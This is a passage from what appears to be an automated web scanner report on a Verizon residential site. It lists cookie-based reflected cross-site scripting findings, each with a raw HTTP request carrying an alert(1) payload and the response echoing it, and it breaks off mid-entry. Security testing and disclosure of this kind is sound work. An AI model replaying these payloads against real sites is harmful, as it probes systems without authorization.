Set-Cookie: ContextInfo_State=TX165a7'><script>alert(1)</script>638a1bf81ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX165A7'><SCRIPT>ALERT(1)</SCRIPT>638A1BF81ED ' />
...[SNIP]...

2.968. https://www22.verizon.com/Residential/FiOSInternet/ [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adc43"-alert(1)-"8aa6b87ac33 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=adc43"-alert(1)-"8aa6b87ac33; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 125619
Expires: Sat, 20 Nov 2010 02:57:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "adc43"-alert(1)-"8aa6b87ac33"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

2.969. https://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a2a'><script>alert(1)</script>3f33f50afae was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX72a2a'><script>alert(1)</script>3f33f50afae; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58779
Expires: Sat, 20 Nov 2010 02:55:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX72a2a'><script>alert(1)</script>3f33f50afae; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX72A2A'><SCRIPT>ALERT(1)</SCRIPT>3F33F50AFAE ' />
...[SNIP]...

2.970. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 429f7'><script>alert(1)</script>ffc246269ca was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX429f7'><script>alert(1)</script>ffc246269ca; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119136
Expires: Sat, 20 Nov 2010 02:57:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX429f7'><script>alert(1)</script>ffc246269ca; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX429F7'><SCRIPT>ALERT(1)</SCRIPT>FFC246269CA ' />
...[SNIP]...

2.971. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8315"-alert(1)-"72b07553601 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=a8315"-alert(1)-"72b07553601; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 125645
Expires: Sat, 20 Nov 2010 02:57:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "a8315"-alert(1)-"72b07553601"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

2.972. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

